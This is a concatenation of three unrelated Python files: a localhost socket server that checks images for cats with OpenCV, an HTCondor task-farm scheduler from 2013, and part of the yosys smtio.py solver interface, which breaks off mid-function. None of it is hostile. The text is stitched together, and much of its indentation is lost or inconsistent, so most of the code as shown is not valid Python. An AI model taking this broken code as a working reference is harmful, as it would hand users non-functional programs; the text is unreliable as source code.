server.py
"""Usage: catcha_server.py SERVER_PORT
Uses OpenCV's cat classifier to check image for cats, returns true or false.
Arguments:
SERVER_PORT port on which to start listening for image payloads
"""
import numpy as np
import cv2
import socket
from docopt import docopt
import sys
from threading import Thread
import base64
def check_for_cat(img_string):
    img = cv2.imdecode(np.frombuffer(base64.b64decode(img_string), np.uint8), cv2.IMREAD_COLOR)
detector = cv2.CascadeClassifier("haarcascade_frontalcatface_extended.xml")
rects = detector.detectMultiScale(img, scaleFactor=1.3, minNeighbors=3, minSize=(75,75))
    if len(rects) == 0:
        return "not_cat"
    else:
        return "cat"
def start_server(port):
soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
soc.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
print('Socket created')
try:
soc.bind(("127.0.0.1", port))
print('Socket bind complete')
    except socket.error as msg:
        print('Bind failed. Error: ' + str(msg))
sys.exit()
    soc.listen(10)  # backlog: up to 10 pending connections may queue before accept()
while True:
conn, addr = soc.accept()
ip, port = str(addr[0]), str(addr[1])
print('Accepting connection from ' + ip + ':' + port)
try:
Thread(target=client_thread, args=(conn, ip, port)).start()
        except Exception:
            print("Terrible error!")
import traceback
traceback.print_exc()
soc.close()
def client_thread(conn, ip, port, MAX_BUFFER_SIZE = 50000):
# the input is in bytes, so decode it
input_from_client_bytes = conn.recv(MAX_BUFFER_SIZE)
    # MAX_BUFFER_SIZE is how big the message can be
    # this checks whether the message filled the whole buffer (sys is imported above)
    siz = sys.getsizeof(input_from_client_bytes)
if siz >= MAX_BUFFER_SIZE:
print("The length of input is probably too long: {}".format(siz))
# decode input and strip the end of line
input_from_client = input_from_client_bytes.decode("utf8").rstrip()
res = do_some_stuffs_with_input(input_from_client)
print("Result of processing {} is: {}".format(input_from_client, res))
vysl = res.encode("utf8") # encode the result string
conn.sendall(vysl) # send it to client
conn.close() # close connection
print('Connection ' + ip + ':' + port + " ended")
def do_some_stuffs_with_input(input_string):
"""
This is where all the processing happens.
Let's just read the string backwards
"""
return check_for_cat(input_string) #input_string[::-1]
if __name__ == '__main__':
args = docopt(__doc__)
start_server(int(args['SERVER_PORT']))
#check_for_cat(args['PATH_TO_IMAGE_THAT_MIGHT_CONTAIN_A_CAT'])
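# --- A minimal client sketch (a separate script, not part of the original file).
# It base64-encodes an image, sends it to the server above, and prints the
# "cat"/"not_cat" reply. The filename and port below are placeholders; note
# that the server reads at most MAX_BUFFER_SIZE bytes, so very large images
# would be truncated.
import base64
import socket

def ask_server(image_path, port=9999):
    with open(image_path, "rb") as f:
        payload = base64.b64encode(f.read())
    soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    soc.connect(("127.0.0.1", port))
    soc.sendall(payload)
    print(soc.recv(1024).decode("utf8"))  # "cat" or "not_cat"
    soc.close()

ask_server("maybe_cat.jpg")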
taskfarm.py
'''
Created on Jul 4, 2013
@author: Vlad & Bert
'''
from threading import Thread
from collections import deque
import os
import sys
import time
import submit_a_task
import get_run_time
import xmltodict
import pprint
pp = pprint.PrettyPrinter(indent=4,stream=sys.stderr)
class Error(Exception):
pass
class UnknownHtcTypeError(Error):
"""Exception raised for unknown tf_type or mode
Attributes:
tf_type -- NOT Either batch, online or workflow
mode -- NOT Either real or demo
"""
def __init__(self, tf_type,mode):
self.tf_type = tf_type
self.mode = mode
def __str__(self):
return "Unknown HTC start value: type %s and/or mode %s" % (self.tf_type, self.mode)
class UnimplementedHtcCombinationError(Error):
"""Exception raised for unimplemented combinations
Attributes:
tf_type -- Either batch, online or workflow
mode -- Either real or demo
"""
def __init__(self, tf_type,mode):
self.tf_type = tf_type
self.mode = mode
def __str__(self):
return "Unimplemented HTC start combination: type %s, mode %s" % (self.tf_type, self.mode)
class TaskFarm:
M_REAL = 'real'
M_DEMO = 'demo'
T_ONLINE = 'online'
T_WF = 'workflow'
T_BATCH= 'batch'
def add_worker(self, worker, worker_id):
self.registered_workers[worker_id]=worker
self.s_registered_workers[worker_id]=str(worker)
def remove_worker(self, worker_id):
del self.registered_workers[worker_id]
del self.s_registered_workers[worker_id]
def get_worker(self,worker_id):
return self.registered_workers[worker_id]
def get_worker_id(self,m_type):
for k in self.registered_workers:
if self.registered_workers[k].type==m_type:
return k
return None
def __init__(self, mode, tf_type):
self.jobs = {} # every entry is a job_id : [ list of bags ]
self.bags = {} # every entry is a job_id : num_of_executed_bags
self.counter = len(self.jobs)
self.registered_workers = {}
self.s_registered_workers = {}
self.mode = mode
        # 'or': either an unknown type or an unknown mode is an error
        if tf_type not in ('batch', 'online', 'workflow') or mode not in ('demo', 'real'):
            raise UnknownHtcTypeError(tf_type, mode)
        if tf_type in ('batch', 'workflow') or mode == 'demo':
            raise UnimplementedHtcCombinationError(tf_type, mode)
        self.type = tf_type
        self.timers = {}  # task_id -> timer; used by callback_time below
self.tf_job_dict = {} # contains simple info per job, per bag, i.e. job.bag : { TotalTasks:x, CompletedTasks:x, ReplicatedTasks:x, ReplicationFactor:x }
self.tf_job_info = {} # contains info on completed tasks i.e. job.bag: [ job.bag.task: [ task_dict 1, ... , task_dict_n ] ]
self.tf_dict = {'jobs':0,'bags':0,'submitted_tasks':0,'completed_tasks':0,'job_dict':self.tf_job_dict}
def __str__(self):
return 'TaskFarm: mode = ' + self.mode + ' , type = ' + self.type + "\n, workers:" + str(self.registered_workers) + "\n bots:" +str(self.jobs)
def add_bot(self, fullpath):
self.tf_dict['jobs'] += 1
job_id = self.counter = len(self.jobs)
self.jobs[self.counter] = deque([])
self.jobs[self.counter].append(fullpath)
jb_key = "%d.%d" % (job_id,0)
        if jb_key not in self.tf_job_dict:
self.tf_job_dict[jb_key] = {}
self.tf_job_dict[jb_key]['SamplingStarted'] = False
self.bags[job_id] = 0
return job_id
def add_on(self, fullpath, jid, atend=True):
self.tf_dict['bags'] += 1 # count the total number of bags in the service
if atend:
self.jobs[jid].append(fullpath)
else:
self.jobs[jid].appendleft(fullpath)
return jid
def execute_job(self, job_id): # TODO need to specify which bag??
if job_id not in self.jobs:
return -1
# TODO check if this job has been sampled, and sampling is finished. Refuse to execute otherwise
Thread(target=self._do_execute_job, args=[job_id]).start()
def _do_execute_job(self, jid): # TODO need to specify which bag??
job_id = int(jid)
while True:
if len(self.jobs[job_id]) == 0:
time.sleep(2)
else:
while len(self.jobs[job_id]) > 0:
self.bags[job_id] += 1
bag_id = self.bags[job_id]
jb_key = "%d.%d" % (job_id,bag_id)
self.tf_job_dict[jb_key] = {}
bag_path = self.jobs[job_id].popleft()
                    with open(bag_path, 'r') as f:
                        lines = f.readlines()
                    line = 0
                    for l in lines:
                        submit_a_task.submit_a_task(job_id, bag_id, line, l, [])
                        line += 1
                        # callback function that needs to state whether a task is done
                        print(l)
self.tf_job_dict[jb_key]['SamplingReady'] = False
self.tf_job_dict[jb_key]['CompletedTasks'] = 0
self.tf_job_dict[jb_key]['TotalTasks'] = line
self.tf_job_dict[jb_key]['SubmittedTasks'] = line
self.tf_dict['submitted_tasks'] += self.tf_job_dict[jb_key]['SubmittedTasks']
self.tf_dict['job_dict'] = self.tf_job_dict
Thread(target=self._do_poll, args=[job_id,self.bags[job_id]]).start()
def job_exists(self, job_id):
return job_id in self.jobs
def sample_job(self, job_id):
# TODO set up a thread for collecting all info when all tasks are finished
if job_id not in self.jobs:
return -1
# TODO check if a bag has already been sampled, and refuse to sample it again
bag_id = 0 # ALWAYS when sampling
jb_key = "%d.%d" % (job_id,bag_id)
if self.tf_job_dict[jb_key]['SamplingStarted'] == True:
if self.tf_job_dict[jb_key]['SamplingReady'] == True:
return -3
return -2
        self.tf_dict['bags'] += 1
        if jb_key not in self.tf_job_dict:
            self.tf_job_dict[jb_key] = {}
        replication_size = 7
        print(job_id)
        bag_path = self.jobs[job_id].popleft()
        with open(bag_path, 'r') as f:
            lines = f.read().splitlines()
        N = len(lines)
        print(N)
        # Sample size for a finite population of N tasks (z = 1.96, error bound 0.2)
        size = int((N * 1.96 * 1.96) // ((1.96 * 1.96) + (2 * (N - 1)) * (0.2 * 0.2)))
# def submit_a_task(jobnr, bagnr, tasknr, commandline, workerlist, thedict={}):
# first: find all available workertypes
type_list=[]
for w in self.registered_workers:
workertype = self.registered_workers[w].type
if workertype not in type_list:
type_list.append(workertype)
# second: submit all tasks in separate commands
self.tf_job_dict[jb_key]['SamplingReady'] = False
# TODO to use condor more efficiently, create just one ClassAd file
        for i in range(0, size):
            # function that submits on each worker type
            print('sample_job sampling', job_id, i, lines[i], file=sys.stderr)
            if i < replication_size:  # to replicate the job on all worker types, use type_list
                submit_a_task.submit_a_task(job_id, bag_id, i, lines[i], type_list)
            else:
                submit_a_task.submit_a_task(job_id, bag_id, i, lines[i], [])
# TODO Put all lines that were not yet submitted in a file for later execution, and put the filename "in front of" the queue
filename_leftovers = "%s/lo-j%d-b%d" % ( os.path.dirname(bag_path), job_id, bag_id )
        print("leftovers go in", filename_leftovers, file=sys.stderr)
        with open(filename_leftovers, "w") as fd:
            for i in range(size, N):
                fd.write(lines[i] + "\n")
self.add_on( filename_leftovers, job_id, False )
# some administration
self.tf_job_dict[jb_key]['SamplingStarted'] = True
self.tf_job_dict[jb_key]['SamplingReady'] = False
self.tf_job_dict[jb_key]['CompletedTasks'] = 0
self.tf_job_dict[jb_key]['TotalTasks'] = size
self.tf_job_dict[jb_key]['SubmittedTasks'] = size + replication_size * ( len ( type_list ) - 1 )
self.tf_dict['submitted_tasks'] += self.tf_job_dict[jb_key]['SubmittedTasks']
self.tf_dict['job_dict'] = self.tf_job_dict
# TODO wait for all jobs to complete and return the run-times
Thread(target=self._do_poll, args=[job_id,bag_id]).start()
# should return list of leftover tasks
return size
def callback_time(self, task_id):
self.timers[task_id] = 0
def _do_poll(self, job_id, bag_id):
_try = 0
jb_key = "%d.%d" % (job_id,bag_id)
filename = "hist-%d-%d.xml" % ( job_id, bag_id )
command = "condor_history -constraint 'HtcJob == %d && HtcBag == %d' -xml > %s" % ( job_id, bag_id, filename )
while True:
_try += 1
_trystr = "Try %d (%s) :" % (_try, jb_key)
# get condor_history and analyse
ret_val = os.system( command )
if ret_val != 0:
# wait a little until the first results come in
                print(_trystr, "wait a little until the first results come in on", filename, file=sys.stderr)
time.sleep(1)
continue
# now we have created a file, check if it has any classads
            with open(filename) as f:
                xmldict = xmltodict.parse(f.read())
            # isinstance() also accepts the OrderedDicts returned by xmltodict
            print("type(xmldict) =", type(xmldict), file=sys.stderr)
            if not (isinstance(xmldict, dict) and 'classads' in xmldict):
                print(_trystr, "No classads, wait a little until the first results come in", file=sys.stderr)
                time.sleep(4)
                continue
            print("type(xmldict['classads']) =", type(xmldict['classads']), file=sys.stderr)
            if not (isinstance(xmldict['classads'], dict) and 'c' in xmldict['classads']):
                print(_trystr, "No classads <c> entries, wait a little until the first results come in", file=sys.stderr)
                time.sleep(4)
                continue
            print("type(xmldict['classads']['c']) =", type(xmldict['classads']['c']), file=sys.stderr)
            if not (isinstance(xmldict['classads']['c'], list) and 'a' in xmldict['classads']['c'][0]):
                print(_trystr, "No classads attributes, wait a little until the first results come in", file=sys.stderr)
                time.sleep(4)
                continue
            print(_trystr, "start polling", filename, file=sys.stderr)
            poll_dict = get_run_time.get_poll_dict(xmldict)
            print(_trystr, "polling done", filename, file=sys.stderr)
            completed_tasks = sum(len(tasks) for tasks in poll_dict.values())
            completed_task_sets = len(poll_dict)
self.tf_dict['completed_tasks'] += ( completed_tasks - self.tf_job_dict[jb_key]['CompletedTasks'] )
self.tf_job_dict[jb_key]['CompletedTasks'] = completed_tasks
self.tf_job_dict[jb_key]['CompletedTaskSets'] = completed_task_sets
            print("polling %s, try %d: SubmittedTasks = %d, CompletedTasks = %d" % (jb_key, _try, self.tf_job_dict[jb_key]['SubmittedTasks'], self.tf_job_dict[jb_key]['CompletedTasks']), file=sys.stderr)
#if _try == 50:
# self.tf_job_dict[jb_key]['SamplingReady'] = True
if self.tf_job_dict[jb_key]['CompletedTasks'] == self.tf_job_dict[jb_key]['SubmittedTasks']:
self.tf_job_info[jb_key] = poll_dict
self.tf_job_dict[jb_key]['SamplingReady'] = True
if self.tf_job_dict[jb_key]['SamplingReady'] == True:
pp.pprint(poll_dict)
return
time.sleep(4)
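# --- A hedged driver sketch (not in the original file), assuming an HTCondor
# setup with the submit_a_task and get_run_time helpers configured, and a bag
# file containing one task command line per line. Only the (online, real)
# combination is implemented, per the checks in __init__. The bag path is a
# placeholder.
tf = TaskFarm(TaskFarm.M_REAL, TaskFarm.T_ONLINE)
jid = tf.add_bot("/path/to/bag0")   # register a job with its first bag
print(tf.sample_job(jid))           # sample a subset; leftovers are re-queued
tf.execute_job(jid)                 # drain the remaining bags in a thread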
smtio.py
#
# yosys -- Yosys Open SYnthesis Suite
#
# Copyright (C) 2012 Clifford Wolf <clifford@clifford.at>
#
# Permission to use, copy, modify, and/or distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
#
import sys, re, os, signal
import subprocess
if os.name == "posix":
import resource
from copy import deepcopy
from select import select
from time import time
from queue import Queue, Empty
from threading import Thread
from smtlog import SmtLog
# This is needed so that the recursive SMT2 S-expression parser
# does not run out of stack frames when parsing large expressions
if os.name == "posix":
smtio_reclimit = 64 * 1024
if sys.getrecursionlimit() < smtio_reclimit:
sys.setrecursionlimit(smtio_reclimit)
current_rlimit_stack = resource.getrlimit(resource.RLIMIT_STACK)
if current_rlimit_stack[0] != resource.RLIM_INFINITY:
smtio_stacksize = 128 * 1024 * 1024
if os.uname().sysname == "Darwin":
# MacOS has rather conservative stack limits
smtio_stacksize = 16 * 1024 * 1024
if current_rlimit_stack[1] != resource.RLIM_INFINITY:
smtio_stacksize = min(smtio_stacksize, current_rlimit_stack[1])
if current_rlimit_stack[0] < smtio_stacksize:
resource.setrlimit(resource.RLIMIT_STACK, (smtio_stacksize, current_rlimit_stack[1]))
# currently running solvers (so we can kill them)
running_solvers = dict()
forced_shutdown = False
solvers_index = 0
def force_shutdown(signum, frame):
global forced_shutdown
if not forced_shutdown:
forced_shutdown = True
if signum is not None:
print("<%s>" % signal.Signals(signum).name)
for p in running_solvers.values():
# os.killpg(os.getpgid(p.pid), signal.SIGTERM)
os.kill(p.pid, signal.SIGTERM)
sys.exit(1)
if os.name == "posix":
signal.signal(signal.SIGHUP, force_shutdown)
signal.signal(signal.SIGINT, force_shutdown)
signal.signal(signal.SIGTERM, force_shutdown)
def except_hook(exctype, value, traceback):
if not forced_shutdown:
sys.__excepthook__(exctype, value, traceback)
force_shutdown(None, None)
sys.excepthook = except_hook
hex_dict = {
"0": "0000", "1": "0001", "2": "0010", "3": "0011",
"4": "0100", "5": "0101", "6": "0110", "7": "0111",
"8": "1000", "9": "1001", "A": "1010", "B": "1011",
"C": "1100", "D": "1101", "E": "1110", "F": "1111",
"a": "1010", "b": "1011", "c": "1100", "d": "1101",
"e": "1110", "f": "1111"
}
class SmtModInfo:
def __init__(self):
self.inputs = set()
self.outputs = set()
self.registers = set()
self.memories = dict()
self.wires = set()
self.wsize = dict()
self.clocks = dict()
self.cells = dict()
self.asserts = dict()
self.covers = dict()
self.anyconsts = dict()
self.anyseqs = dict()
self.allconsts = dict()
self.allseqs = dict()
self.asize = dict()
class SmtIo:
def __init__(self, opts=None, logs=None):
global solvers_index
self.logic = None
self.logic_qf = True
self.logic_ax = True
self.logic_uf = True
self.logic_bv = True
self.logic_dt = False
self.forall = False
self.produce_models = True
self.smt2cache = [list()]
self.p = None
self.p_index = solvers_index
solvers_index += 1
if opts is not None:
self.logic = opts.logic
self.solver = opts.solver
self.solver_opts = opts.solver_opts
self.debug_print = opts.debug_print
self.debug_file = opts.debug_file
self.dummy_file = opts.dummy_file
self.timeinfo = opts.timeinfo
self.unroll = opts.unroll
self.noincr = opts.noincr
self.info_stmts = opts.info_stmts
self.nocomments = opts.nocomments
else:
self.solver = "yices"
self.solver_opts = list()
self.debug_print = False
self.debug_file = None
self.dummy_file = None
self.timeinfo = os.name != "nt"
self.unroll = False
self.noincr = False
self.info_stmts = list()
self.nocomments = False
if logs is None:
self.smtlog = SmtLog()
else:
self.smtlog = logs
self.start_time = time()
self.modinfo = dict()
self.curmod = None
self.topmod = None
self.setup_done = False
def __del__(self):
if self.p is not None and not forced_shutdown:
os.killpg(os.getpgid(self.p.pid), signal.SIGTERM)
if running_solvers is not None:
del running_solvers[self.p_index]
def setup(self):
assert not self.setup_done
if self.forall:
self.unroll = False
if self.solver == "yices":
if self.noincr:
self.popen_vargs = ['yices-smt2'] + self.solver_opts
else:
self.popen_vargs = ['yices-smt2', '--incremental'] + self.solver_opts
if self.solver == "z3":
self.popen_vargs = ['z3', '-smt2', '-in'] + self.solver_opts
if self.solver == "cvc4":
if self.noincr:
self.popen_vargs = ['cvc4', '--lang', 'smt2.6' if self.logic_dt else 'smt2'] + self.solver_opts
else:
self.popen_vargs = ['cvc4', '--incremental', '--lang', 'smt2.6' if self.logic_dt else 'smt2'] + self.solver_opts
if self.solver == "mathsat":
self.popen_vargs = ['mathsat'] + self.solver_opts
if self.solver == "boolector":
if self.noincr:
self.popen_vargs = ['boolector', '--smt2'] + self.solver_opts
else:
self.popen_vargs = ['boolector', '--smt2', '-i'] + self.solver_opts
self.unroll = True
if self.solver == "abc":
if len(self.solver_opts) > 0:
self.popen_vargs = ['yosys-abc', '-S', '; '.join(self.solver_opts)]
else:
self.popen_vargs = ['yosys-abc', '-S', '%blast; &sweep -C 5000; &syn4; &cec -s -m -C 2000']
self.logic_ax = False
self.unroll = True
self.noincr = True
if self.solver == "dummy":
assert self.dummy_file is not None
self.dummy_fd = open(self.dummy_file, "r")
else:
if self.dummy_file is not None:
self.dummy_fd = open(self.dummy_file, "w")
if not self.noincr:
self.p_open()
if self.unroll:
assert not self.forall
self.logic_uf = False
self.unroll_idcnt = 0
self.unroll_buffer = ""
self.unroll_sorts = set()
self.unroll_objs = set()
self.unroll_decls = dict()
self.unroll_cache = dict()
self.unroll_stack = list()
if self.logic is None:
self.logic = ""
if self.logic_qf: self.logic += "QF_"
if self.logic_ax: self.logic += "A"
if self.logic_uf: self.logic += "UF"
if self.logic_bv: self.logic += "BV"
if self.logic_dt: self.logic = "ALL"
self.setup_done = True
for stmt in self.info_stmts:
self.write(stmt)
if self.produce_models:
self.write("(set-option :produce-models true)")
self.write("(set-logic %s)" % self.logic)
def timestamp(self):
secs = int(time() - self.start_time)
return "## %3d:%02d:%02d " % (secs // (60*60), (secs // 60) % 60, secs % 60)
def replace_in_stmt(self, stmt, pat, repl):
if stmt == pat:
return repl
if isinstance(stmt, list):
return [self.replace_in_stmt(s, pat, repl) for s in stmt]
return stmt
def unroll_stmt(self, stmt):
if not isinstance(stmt, list):
return stmt
stmt = [self.unroll_stmt(s) for s in stmt]
if len(stmt) >= 2 and not isinstance(stmt[0], list) and stmt[0] in self.unroll_decls:
assert stmt[1] in self.unroll_objs
key = tuple(stmt)
if key not in self.unroll_cache:
decl = deepcopy(self.unroll_decls[key[0]])
self.unroll_cache[key] = "|UNROLL#%d|" % self.unroll_idcnt
decl[1] = self.unroll_cache[key]
self.unroll_idcnt += 1
if decl[0] == "declare-fun":
if isinstance(decl[3], list) or decl[3] not in self.unroll_sorts:
self.unroll_objs.add(decl[1])
decl[2] = list()
else:
self.unroll_objs.add(decl[1])
decl = list()
elif decl[0] == "define-fun":
arg_index = 1
for arg_name, arg_sort in decl[2]:
decl[4] = self.replace_in_stmt(decl[4], arg_name, key[arg_index])
arg_index += 1
decl[2] = list()
if len(decl) > 0:
decl = self.unroll_stmt(decl)
self.write(self.unparse(decl), unroll=False)
return self.unroll_cache[key]
return stmt
def p_thread_main(self):
while True:
data = self.p.stdout.readline().decode("ascii")
if data == "": break
self.p_queue.put(data)
self.p_queue.put("")
self.p_running = False
def p_open(self):
assert self.p is None
self.p = subprocess.Popen(self.popen_vargs, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
running_solvers[self.p_index] = self.p
self.p_running = True
self.p_next = None
self.p_queue = Queue()
self.p_thread = Thread(target=self.p_thread_main)
self.p_thread.start()
def p_write(self, data, flush):
assert self.p is not None
self.p.stdin.write(bytes(data, "ascii"))
if flush: self.p.stdin.flush()
def p_read(self):
assert self.p is not None
if self.p_next is not None:
data = self.p_next
self.p_next = None
return data
if not self.p_running:
return ""
return self.p_queue.get()
def p_poll(self, timeout=0.1):
assert self.p is not None
assert self.p_running
if self.p_next is not None:
return False
try:
self.p_next = self.p_queue.get(True, timeout)
return False
except Empty:
return True
def p_close(self):
assert self.p is not None
self.p.stdin.close()
self.p_thread.join()
assert not self.p_running
del running_solvers[self.p_index]
self.p = None
self.p_next = None
self.p_queue = None
self.p_thread = None
def write(self, stmt, unroll=True):
self.smtlog.write_line(stmt) # Write log
if stmt.startswith(";"):
self.info(stmt)
if not self.setup_done:
self.info_stmts.append(stmt)
return
elif not self.setup_done:
self.setup()
stmt = stmt.strip()
if self.nocomments or self.unroll:
stmt = re.sub(r" *;.*", "", stmt)
if stmt == "": return
if unroll and self.unroll:
stmt = self.unroll_buffer + stmt
self.unroll_buffer = ""
s = re.sub(r"\|[^|]*\|", "", stmt)
if s.count("(") != s.count(")"):
self.unroll_buffer = stmt + " "
return
s = self.parse(stmt)
if self.debug_print:
print("-> %s" % s)
if len(s) == 3 and s[0] == "declare-sort" and s[2] == "0":
self.unroll_sorts.add(s[1])
return
elif len(s) == 4 and s[0] == "declare-fun" and s[2] == [] and s[3] in self.unroll_sorts:
self.unroll_objs.add(s[1])
return
elif len(s) >= 4 and s[0] == "declare-fun":
for arg_sort in s[2]:
if arg_sort in self.unroll_sorts:
self.unroll_decls[s[1]] = s
return
elif len(s) >= 4 and s[0] == "define-fun":
for arg_name, arg_sort in s[2]:
if arg_sort in self.unroll_sorts:
self.unroll_decls[s[1]] = s
return
stmt = self.unparse(self.unroll_stmt(s))
if stmt == "(push 1)":
self.unroll_stack.append((
deepcopy(self.unroll_sorts),
deepcopy(self.unroll_objs),
deepcopy(self.unroll_decls),
deepcopy(self.unroll_cache),
))
if stmt == "(pop 1)":
self.unroll_sorts, self.unroll_objs, self.unroll_decls, self.unroll_cache = self.unroll_stack.pop()
if self.debug_print:
print("> %s" % stmt)
if self.debug_file:
print(stmt, file=self.debug_file)
self.debug_file.flush()
if self.solver != "dummy":
if self.noincr:
if self.p is not None and not stmt.startswith("(get-"):
self.p_close()
if stmt == "(push 1)":
self.smt2cache.append(list())
elif stmt == "(pop 1)":
self.smt2cache.pop()
else:
if self.p is not None:
self.p_write(stmt + "\n", True)
self.smt2cache[-1].append(stmt)
else:
self.p_write(stmt + "\n", True)
def info(self, stmt):
if not stmt.startswith("; yosys-smt2-"):
return
fields = stmt.split()
if fields[1] == "yosys-smt2-nomem":
if self.logic is None:
self.logic_ax = False
if fields[1] == "yosys-smt2-nobv":
if self.logic is None:
self.logic_bv = False
if fields[1] == "yosys-smt2-stdt":
if self.logic is None:
self.logic_dt = True
if fields[1] == "yosys-smt2-forall":
if self.logic is None:
self.logic_qf = False
self.forall = True
if fields[1] == "yosys-smt2-module":
self.curmod = fields[2]
self.modinfo[self.curmod] = SmtModInfo()
if fields[1] == "yosys-smt2-cell":
self.modinfo[self.curmod].cells[fields[3]] = fields[2]
if fields[1] == "yosys-smt2-topmod":
self.topmod = fields[2]
if fields[1] == "yosys-smt2-input":
self.modinfo[self.curmod].inputs.add(fields[2])
self.modinfo[self.curmod].wsize[fields[2]] = int(fields[3])
if fields[1] == "yosys-smt2-output":
self.modinfo[self.curmod].outputs.add(fields[2])
self.modinfo[self.curmod].wsize[fields[2]] = int(fields[3])
if fields[1] == "yosys-smt2-register":
self.modinfo[self.curmod].registers.add(fields[2])
self.modinfo[self.curmod].wsize[fields[2]] = int(fields[3])
if fields[1] == "yosys-smt2-memory":
self.modinfo[self.curmod].memories[fields[2]] = (int(fields[3]), int(fields[4]), int(fields[5]), int(fields[6]), fields[7] == "async")
if fields[1] == "yosys-smt2-wire":
self.modinfo[self.curmod].wires.add(fields[2])
self.modinfo[self.curmod].wsize[fields[2]] = int(fields[3])
if fields[1] == "yosys-smt2-clock":
for edge in fields[3:]:
if fields[2] not in self.modinfo[self.curmod].clocks:
self.modinfo[self.curmod].clocks[fields[2]] = edge
elif self.modinfo[self.curmod].clocks[fields[2]] != edge:
self.modinfo[self.curmod].clocks[fields[2]] = "event"
if fields[1] == "yosys-smt2-assert":
self.modinfo[self.curmod].asserts["%s_a %s" % (self.curmod, fields[2])] = fields[3]
if fields[1] == "yosys-smt2-cover":
self.modinfo[self.curmod].covers["%s_c %s" % (self.curmod, fields[2])] = fields[3]
if fields[1] == "yosys-smt2-anyconst":
self.modinfo[self.curmod].anyconsts[fields[2]] = (fields[4], None if len(fields) <= 5 else fields[5])
self.modinfo[self.curmod].asize[fields[2]] = int(fields[3])
if fields[1] == "yosys-smt2-anyseq":
self.modinfo[self.curmod].anyseqs[fields[2]] = (fields[4], None if len(fields) <= 5 else fields[5])
self.modinfo[self.curmod].asize[fields[2]] = int(fields[3])
if fields[1] == "yosys-smt2-allconst":
self.modinfo[self.curmod].allconsts[fields[2]] = (fields[4], None if len(fields) <= 5 else fields[5])
self.modinfo[self.curmod].asize[fields[2]] = int(fields[3])
if fields[1] == "yosys-smt2-allseq":
self.modinfo[self.curmod].allseqs[fields[2]] = (fields[4], None if len(fields) <= 5 else fields[5])
self.modinfo[self.curmod].asize[fields[2]] = int(fields[3])
def hiernets(self, top, regs_only=False):
def hiernets_worker(nets, mod, cursor):
for netname in sorted(self.modinfo[mod].wsize.keys()):
if not regs_only or netname in self.modinfo[mod].registers:
nets.append(cursor + [netname])
for cellname, celltype in sorted(self.modinfo[mod].cells.items()):
hiernets_worker(nets, celltype, cursor + [cellname])
nets = list()
hiernets_worker(nets, top, [])
return nets
def hieranyconsts(self, top):
def worker(results, mod, cursor):
for name, value in sorted(self.modinfo[mod].anyconsts.items()):
width = self.modinfo[mod].asize[name]
results.append((cursor, name, value[0], value[1], width))
for cellname, celltype in sorted(self.modinfo[mod].cells.items()):
worker(results, celltype, cursor + [cellname])
results = list()
worker(results, top, [])
return results
def hieranyseqs(self, top):
def worker(results, mod, cursor):
for name, value in sorted(self.modinfo[mod].anyseqs.items()):
width = self.modinfo[mod].asize[name]
results.append((cursor, name, value[0], value[1], width))
for cellname, celltype in sorted(self.modinfo[mod].cells.items()):
worker(results, celltype, cursor + [cellname])
results = list()
worker(results, top, [])
return results
def hierallconsts(self, top):
def worker(results, mod, cursor):
for name, value in sorted(self.modinfo[mod].allconsts.items()):
width = self.modinfo[mod].asize[name]
results.append((cursor, name, value[0], value[1], width))
for cellname, celltype in sorted(self.modinfo[mod].cells.items()):
worker(results, celltype, cursor + [cellname])
results = list()
worker(results, top, [])
return results
def hierallseqs(self, top):
def worker(results, mod, cursor):
for name, value in sorted(self.modinfo[mod].allseqs.items()):
width = self.modinfo[mod].asize[name]
results.append((cursor, name, value[0], value[1], width))
for cellname, celltype in sorted(self.modinfo[mod].cells.items()):
worker(results, celltype, cursor + [cellname])
results = list()
worker(results, top, [])
return results
def hiermems(self, top):
def hiermems_worker(mems, mod, cursor):
for memname in sorted(self.modinfo[mod].memories.keys()):
mems.append(cursor + [memname])
for cellname, celltype in sorted(self.modinfo[mod].cells.items()):
hiermems_worker(mems, celltype, cursor + [cellname])
mems = list()
hiermems_worker(mems, top, [])
return mems
def read(self):
stmt = []
count_brackets = 0
while True:
if self.solver == "dummy":
line = self.dummy_fd.readline().strip()
else:
line = self.p_read().strip()
if self.dummy_file is not None:
self.dummy_fd.write(line + "\n")
count_brackets += line.count("(")
count_brackets -= line.count(")")
stmt.append(line)
if self.debug_print:
print("< %s" % line)
if count_brackets == 0:
break
if self.solver != "dummy" and self.p.poll():
print("%s Solver terminated unexpectedly: %s" % (self.timestamp(), "".join(stmt)), flush=True)
sys.exit(1)
stmt = "".join(stmt)
if stmt.startswith("(error"):
print("%s Solver Error: %s" % (self.timestamp(), stmt), flush=True)
if self.solver != "dummy":
self.p_close()
sys.exit(1)
return stmt
def check_sat(self):
if self.debug_print:
print("> (check-sat)")
if self.debug_file and not self.nocomments:
print("; running check-sat..", file=self.debug_file)
self.debug_file.flush()
if self.solver != "dummy":
if self.noincr:
if self.p is not None:
self.p_close()
self.p_open()
for cache_ctx in self.smt2cache:
for cache_stmt in cache_ctx:
self.p_write(cache_stmt + "\n", False)
self.p_write("(check-sat)\n", True)
if self.timeinfo:
i = 0
s = "/-\|"
count = 0
num_bs = 0
while self.p_poll():
count += 1
if count < 25:
continue
if count % 10 == 0 or count == 25:
secs = count // 10
if secs < 60:
m = "(%d seconds)" % secs
elif secs < 60*60:
m = "(%d seconds -- %d:%02d)" % (secs, secs // 60, secs % 60)
else:
m = "(%d seconds -- %d:%02d:%02d)" % (secs, secs // (60*60), (secs // 60) % 60, secs % 60)
print("%s %s %c" % ("\b \b" * num_bs, m, s[i]), end="", file=sys.stderr)
num_bs = len(m) + 3
else:
print("\b" + s[i], end="", file=sys.stderr)
sys.stderr.flush()
